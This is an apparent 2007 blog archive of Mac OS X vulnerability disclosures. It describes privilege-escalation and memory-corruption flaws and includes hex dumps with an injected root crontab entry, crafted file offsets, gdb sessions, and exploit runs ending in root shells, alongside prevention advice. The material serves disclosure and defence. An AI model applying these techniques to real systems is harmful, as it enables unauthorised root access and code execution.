Sunday, 28 January 2007

Apple crashdump Privilege Escalation Vulnerability

Vendor:: Apple
Application:: Mac OS X
Disclosed:: 28-01-07
Description:: Crashreporterd is the daemon responsible for detecting application crashes. Crashreporterd listens for mach exceptions and when it detects a mach exception launches crashdump to investigate the crash and report it to the user. Crashdump is a helper tool used by the crashreporterd daemon to create crash reports and notify the user of application crashes.
crashdump will try to write reports at the user home directory first
(/Users/[user]/Library/Logs/CrashReporter/), and if it's not available (ex. permissions don't allow it), it will try the system-wide log directory instead (ex. /Library/Logs/CrashReporter/).
The problem is that it will follow symlinks, and users in the admin group have write access to the directory. As crashreporterd runs under root privileges, any file can be modified by planting a symlink in the /Library/Logs/CrashReporter/ directory, named like the application that will cause the crash dump. We can influence the output by tampering with the Mach-O format. The provided proof of concept demonstrates this by using crafted library names within the binary that triggers the issue.
Exploitation of this issue allows admin-group users (contrary to MOAB-22-01-2007 which allows any user) to gain root privileges without interaction of any type.
Exploit:: The exploit will use a Mach-o binary with a crontab string injected in it's __LINKEDIT segment, for triggering the issue and demonstrating how we can execute arbitrary code under root privileges via crashdump.
The data we are modifying within the Mach-O binary is the __LINKEDIT segment, described in the Mac OS X ABI Mach-O File Format Reference as follows::
The __LINKEDIT segment contains raw data used by the dynamic linker, such as symbol, string, and relocation table entries.
In the sample binary file (starting at offset 0x320)::
38 00 00 00 5F 5F 4C 49 4E 4B 45 44 49 54 00 00 \00 00 00 00 00 40 00 00 00 10 00 00 00 30 00 00 20 04 00 00 03 00 00 00 01 00 00 00 00 00 00 00 ---> __LINKEDIT04 00 00 00 0E 00 00 00 1C 00 00 00 0C 00 00 00 2F 75 73 72 2F 6C 69 62 2F 64 79 6C 64 00 00 00 /0C 00 00 00 34 00 00 00 18 00 00 00 68 B7 9B 4504 03 58 00 00 00 01 00 0A 0A 2A 20 2A 20 2A 20 \2A 20 2A 20 2F 55 73 65 72 73 2F 53 68 61 72 65 ---> injected crontab 64 2F 72 30 30 74 0A 00 18 00 00 00 00 30 00 00 /
MORE...
Links::
MOAB-28-01-2007.rb
vuln (Modified Mach-o binary)

Saturday, 27 January 2007

Telestream Flip4Mac WMV Parsing Memory Corruption Vulnerability

Vendor:: Apple
Application:: Mac OS X - Windows
  • QuickTime™ Player 7.1.3
  • Windows Media ® Components for Quicktime 2.1.0.33
Disclosed:: 27-01-07
Description:: Flip4Mac fails to properly handle WMV files with a crafted ASF_File_Properties_Object size field, leading to an exploitable memory corruption condition, which can be abused remotely for arbitrary code execution.
Exploit:: Flip4Mac™ WMV is a collection of QuickTime components that allow you to play, import, and export Windows Media video and audio files on your Mac using your favorite QuickTime-based applications.
WMV files use the Advanced Systems Format (ASF) container format, originally supported for Macintosh systems via Microsoft's "Windows Media Player for Mac". Since Microsoft decided to stop development of it's Mac-port of WM Player, Flip4Mac became the 'endorsed', somehow official solution.
It fails to properly handle WMV files with a crafted ASF_File_Properties_Object size field, leading to an exploitable memory corruption condition, which can be abused remotely for arbitrary code execution.
ASF_File_Properties_Object:
8CABDCA1-A947-11CF-8EE4-00C00C205365 71494647607722088 112 --| GUID
0x70: A1 DC AB 8C 47 A9 CF 11 8E E4 00 C0 0C 20 53 65 ----/
0x80: 68 00 00 FF 00 00 00 00 63 79 0C 20 28 50 D5 11 [size at 0x80]
Given that we can overwrite saved eip (and thus subvert the execution flow) and provide any payload of our choice by appending it to the WMV file, exploitation for arbitrary code execution is clearly possible. Although, the conditions for PowerPC and x86 are slightly different, and thus the same file won't work for both architectures (this has nothing to do with payload limitations, as we can use one that will work for both ppc and x86, like nemo's multi-arch shellcode).
A working exploit for this issue might be developed later today and released as soon as it's been tested and known to be reliable.
The sample proof of concept provided shows saved eip being overwritten with a bogus address (it's known to not work on PowerPC, as the conditions are slightly different).
MORE...
Prevention::Disable Flip4Mac and/or automated opening of WMV files, and wait for a patch to be released by the vendor (Telestream).
Links::
PoC:: MOAB-27-01-2007.wmv
MOAB-27-01-2007

Thursday, 25 January 2007

Apple CFNetwork HTTP Response Denial of Service

Vendor:: Apple
Application:: Mac OS X
Disclosed:: 25-01-07
Description:: CFNetwork fails to handle certain HTTP responses properly, causing the _CFNetConnectionWillEnqueueRequests() function to dereference a NULL pointer, leading to a denial of service condition exploitable by a server sending a crafted response to a client application making use of this API.
Exploit:: The provided proof of concept will listen at the specified port for incoming connections and send back the response necessary to reproduce the denial of service condition on any default CFNetwork-based client.
$ gcc MOAB-25-01-2007.c -o cfnet-http -framework Carbon
$ ruby MOAB-25-01-2007.rb 8080
++ Starting HTTP server at port 8080.
(once ./cfnet-http runs or CFNetwork client connects...)
++ Connected: CFNetwork/129.19
le...).
Prevention:: Perform sanity checking of HTTP responses received via CFNetwork API.Wait for Apple to add further checks and fix the _CFNetConnectionWillEnqueueRequests() API.
Links::
MOAB-25-01-2007
PoC:: MOAB-25-01-2007.rb and MOAB-25-01-2007.c

Tuesday, 23 January 2007

Apple QuickDraw GetSrcBits32ARGB() Memory Corruption Vulnerability

Vendor:: Apple
Application:: Mac OS X
Disclosed:: 23-01-07
Description:: QuickDraw is integrated in Mac OS X since very early versions, used by Quicktime and any other application that needs to handle PICT images. A vulnerability exists in the handling of ARGB records (Alpha RGB) within PICT images, that leads to an exploitable memory corruption condition (ex. denial of service, so-called crash, which can be used to gain root privileges in combination with MOAB-22-01-2007).
Exploit:: A specially crafted PICT image with a malformed ARGB record can abuse this issue for subverting the pointer passed to the _GetSrcBits32ARGB() function. Up to 3 bytes can be controlled, as the last one is a fixed value (0x70, incremental) and isn't influenced by the image data structure::
at offset 662:

06 ED BB ED AD ED DE
[length] [-] [R] [-] [G] [-] [B]

ADED -> 0xdead
BB+0x03 -> 0xbe
plus fixed value: 0x70

result: 0xdeadbe70

This is enough for pointing at an absolutely different address
(ex. at heap or stack space,user controlled). A valid address will most probably
cause the application to continue execution, although an invalid one will lead to
a memory access violation (KERN_INVALID_ADDRESS exception).

06 ED BB ED AD ED BF
[length] [-] [R] [-] [G] [-] [B]
result: 0xbfadbe70


(gdb) break *0x91782c44
Breakpoint 1 at 0x91782c44
(gdb) r
The program being debugged has been started already.
Start it from the beginning? (y or n) y
(...)
Reading symbols for shared libraries . done

Breakpoint 1, 0x91782c44 in _GetSrcBits32ARGB ()
(gdb) x/4x $eax
0xbfadbe70: 0x00000000 0x00000000 0x00000000 0x00000000

Once execution continues, the address is repeatedly incremented:

Breakpoint 1, 0x91782c44 in _GetSrcBits32ARGB () (gdb) p (void *)$eax $2 = (void *) 0xbfadbe90 (gdb) c Breakpoint 1, 0x91782c44 in _GetSrcBits32ARGB () (gdb) p (void *)$eax $3 = (void *) 0xbfadbe94 (gdb) c Breakpoint 1, 0x91782c44 in _GetSrcBits32ARGB () (gdb) p (void *)$eax $4 = (void *) 0xbfadbe98 (gdb) c Breakpoint 1, 0x91782c44 in _GetSrcBits32ARGB () (gdb) p (void *)$eax $5 = (void *) 0xbfadbe9c (...)
While arbitrary code execution might be possible, until further research is done, it can't be stated as currently viable condition.
Links::
MOAB-23-01-2007
PoC:: MOAB-23-01-2007.pct

Monday, 22 January 2007

Apple UserNotificationCenter Privilege Escalation Vulnerability

Vendor:: Apple
Application:: Mac OS X
Disclosed:: 22-01-07
Description:: UserNotificationCenter retains wheel privileges on execution time, and still has a UID associated with the current user. Because of this, it> will attempt to run any InputManager provided by the user. Code within the input manager will run under wheel privileges. In combination with diskutil and a wheel-writable setuid binary, this allows unprivileged users to gain root privileges.
Exploit::
$ ruby bug-files/MOAB-22-01-2007.rb 0
++ Welcome to Pwndertino...
% Total % Received % Xferd Average Speed Time Time Time Current
Dload Upload Total Spent Left Speed
100 4513 100 4513 0 0 4165 0 0:00:01 0:00:01 --:--:-- 12642
r00tim/
r00tim/Info
r00tim/r00tim.bundle/
r00tim/r00tim.bundle/Contents/
r00tim/r00tim.bundle/Contents/Info.plist
r00tim/r00tim.bundle/Contents/MacOS/
r00tim/r00tim.bundle/Contents/MacOS/r00tim
r00tim/r00tim.bundle/Contents/Resources/
r00tim/r00tim.bundle/Contents/Resources/English.lproj/
r00tim/r00tim.bundle/Contents/Resources/English.lproj/InfoPlist.strings
$ /Applications/System\ Preferences.app/Contents/Resources/installAssistant
sh-2.05b# id
uid=0(root) gid=0(wheel) groups=0(wheel), 81(appserveradm), 79(appserverusr), 80(admin)
A CFUserNotification object presents a simple dialog on the screen and optionally receives feedback from the user. The contents of the dialog can include a header, a message, an icon, text fields, a pop-up button, radio buttons or checkboxes, and up to three ordinary buttons. Use CFUserNotification in processes that do not otherwise have user interfaces, but may need occasional interaction with the user.
The API involved in the handling of these dialogs, CFUserNotificationSendRequest(), works by sending a Mach message to a port named "com.apple.UNCUserNotification".
---- UserNotification-17.1/Libunc/UNCUserNotification.c
#define NOTIFICATION_PORT_NAME "com.apple.UNCUserNotification"
#define NOTIFICATION_PORT_NAME_OLD "UNCUserNotification"
---- UserNotification-17.1/Libunc/UNCUserNotification.c
Basically, this vulnerability makes every "denial of service issue" leading to a so-called 'crash' usable for escalating privileges. Elevating to root from wheel is as simple as replacing the installAssistant binary with a setuid(0) shell wrapper and running diskutil to "repair" the permissions, setting the setuid bit back. diskutil requires the user to have admin group privileges, but due to the fact that it's being executed in the context of the InputManager (which, again, runs with wheel privileges) the issue can be successfully exploited by fully unprivileged users.
Actually, /System/Library/CoreServices/loginwindow.app/Contents/MacOS/loginwindow is responsible
for operating the com.apple.UNCUserNotification port. For example, making a call to CFUserNotificationDisplayAlert() will lead to a call of CFUserNotificationSendRequest() which then interacts with the Mach port. Upon connection, UserNotificationCenter.app application is launched to handle the notification requests. In essence, the notification center application is launched on demand, at any time by any process.
Although, the application retains wheel privileges on execution time, and still has a UID associated with the current user. Because of this, UserNotificationCenter.app will attempt to run any InputManager that the user has placed into ~/Library/InputManagers. The code that is run within the input manager will do so under wheel privileges. In combination with diskutil and a wheel-writable setuid binary, this allows unprivileged users to gain root privileges.
MORE...
Prevention:: Limit user access to ~/Library/InputManagers/. Prevent use of diskutil (modification of permissions of the installAssistant binary isn't enough as the tool will set the permissions back).
Links::
PoC:: MOAB-22-01-2007.rb
MOAB-22-01-2007

Sunday, 21 January 2007

Apple System Preferences writeconfig Local Privilege Escalation Vulnerability

Vendor:: Apple
Application:: Mac OS X
Disclosed:: 21-01-07
Description:: The preference panes setuid helper, writeconfig, makes use of a shell script which lacks of PATH sanitization, allowing users to execute arbitrary binaries under root privileges.
Apple provides the following description in the The Preference Application documentation::
System Preferences is the standard location for presenting system-level preferences on OSX. The preference panes shipped with Mac OS X include panes affecting hardware (such as the Sound, Mouse, and Display panes), software integrated into the system (such as the Dock and Screen Saver panes), and behavior applicable to every application (such as the International and General panes). When application preferences apply to the system or to the user's environment as a whole, a developer can make the preference pane available to System Preferences.
Several of the default preference panes rely on a setuid helper, writeconfig.
Exploit:: The provided (simplistic) exploit will create a root setuid shell wrapper at /tmp/shX. It relies on minimal interaction by the user, read the 'Exploitation conditions' section as this is just one of the possible methods to abuse the issue.
$ ruby MOAB-21-01-2007.rb
++ Click on Sharing and then click on Windows Sharing...
sh-2.05b# id
uid=501(lmh) gid=501(lmh) euid=0(root) groups=501(lmh), 81(appserveradm),
79(appserverusr), 80(admin)
sh-2.05b# ls -al /private/tmp/
total 72
(...)
-rwxr-xr-x 1 lmh wheel 13344 Jan 21 19:29 launchctl
-rwsr-xr-x 1 root wheel 13344 Jan 21 19:29 shX
-rw-r--r-- 1 lmh wheel 78 Jan 21 19:29 t.c
sh-2.05b# exit
exit
More...
Prevention::
Modify /sbin/service::
$ head /sbin/service
#!/bin/sh

set -e
export PATH="/bin:/sbin:/usr/sbin:/usr/bin"

# don't let people kill us. We shouldn't be long, so this isn't a big deal.

trap "" TSTP
trap "" HUP

trap "" INT
Links::
MOAB-21-01-2007
Exploit:: MOAB-21-01-2007.rb

Wednesday, 17 January 2007

Apple SLP Daemon Service Registration Buffer Overflow Vulnerability

Vendor:: Apple
Application:: Mac OS X
Disclosed:: 17-01-07
Description:: slpd is vulnerable to a buffer overflow condition when processing the attr-list field of a registration request, leading to an exploitable denial of service condition and potential arbitrary execution. It would allow unprivileged local (and possibly remote) users to execute arbitrary code under root privileges.
Apple introduced three new APIs that use Bonjour for service discovery. The new APIs are CFNetServices, NSNetServices and DNSServiceDiscovery. In general If your application is targeted to run on Mac OS X 10.2 and later, Apple highly recommends that you use the Bonjour APIs directly for your service discovery needs, instead of NSL.
/usr/sbin/slpd is the path to the Apple Minimal SLP v2 Service Agent, according to the RFC this type of agent is "A process working on the behalf of one or more services to advertise the services". The man page provides the following description::
The SLP daemon (Service Location Protocol) advertises local services to the network. It supports registrations from the slp_reg tool as well as NSL (Network Service Location) and the Directory Services SLP plugin.
slpd is vulnerable to a buffer overflow condition when processing the attr-list field of a registration request, leading to an exploitable denial of service condition and potential arbitrary execution. It would allow unprivileged local (and possibly remote) users to execute arbitrary code under root privileges.
Remote exploitation seems possible, although it's still being verified.
Exploit:: The provided proof of concept uses the local socket opened by slpd for sending the payload. Check the source code for more information.
$ ruby MOAB-17-01-2007.rb

Program received signal EXC_BAD_ACCESS, Could not access memory.
Reason: KERN_INVALID_ADDRESS at address: 0x8edd9eb1
[Switching to process 22158 thread 0x1e03]
0xffff0ac4 in ___memcpy ()
228 in /System/Library/Frameworks/System.framework/PrivateHeaders/i386/cpu_capabilities.h

(gdb) i r
eax 0xffff07a0 -63584
ecx 0xdeadbeed -559038739
edx 0x2 2
ebx 0xffffffff -1
esp 0xb02fdd70 0xb02fdd70
ebp 0xb02fdd78 0xb02fdd78
esi 0x8edd9eb1 -1898078543
edi 0x8ede19a2 -1898047070
eip 0xffff0ac4 0xffff0ac4 <___memcpy+804>
(...)

(gdb) x/12x $esp
0xb02fdd70: 0xb0305ab4 0x00000000 0xb0305ee8 0x0000b9a7
0xb02fdd80: 0xb0305ab3 0xb02fdfc3 0xdeadbeef 0xb0305ec4
0xb02fdd90: 0xb0305ebc 0xb0305eb8 0xb0305ecc 0xb0305ec8

(gdb) x/8x $ebp
0xb02fdd78: 0xb0305ee8 0x0000b9a7 0xb0305ab3 0xb02fdfc3
0xb02fdd88: 0xdeadbeef 0xb0305ec4 0xb0305ebc 0xb0305eb8


(gdb) break *0x0000b9a2
(gdb) r
(...)
(gdb) info breakpoints
Num Type Disp Enb Address What
3 breakpoint keep y 0x0000b9a2
(gdb) x/1x 0xb02fddc5+506
0xb02fdfbf: 0xdeadbeef
(gdb) x/1x 0xb02fddc5
0xb02fddc5: 0x58585858

(gdb) x/6 0xb991
0xb991: mov -32(%ebp),%eax
0xb994: mov %eax,8(%esp)
0xb998: mov -28(%ebp),%eax
0xb99b: mov %eax,4(%esp)
0xb99f: mov %ecx,(%esp)
0xb9a2: call 0x220dc

(gdb) x/1x $ebp-32
0xb0305ec8: 0xdeadbeef
(gdb) x/1x $esp+8
0xb02fdd88: 0xdeadbeef
(gdb) x/1x $ebp-28
0xb0305ecc: 0xb02fdfc3
(gdb) x/1x $esp+4
0xb02fdd84: 0xb02fdfc3
(gdb) x/1x $esp

0xb02fdd80: 0xb0305ab3
Prevention:: Wait for Apple to release a patch. Disable Personal file sharing and ensure slpd isn't running. This issue was reported to Apple on 8/2/06 5:31 PM.
Links::
MOAB-17-01-2007.rb
MOAB-17-01-2007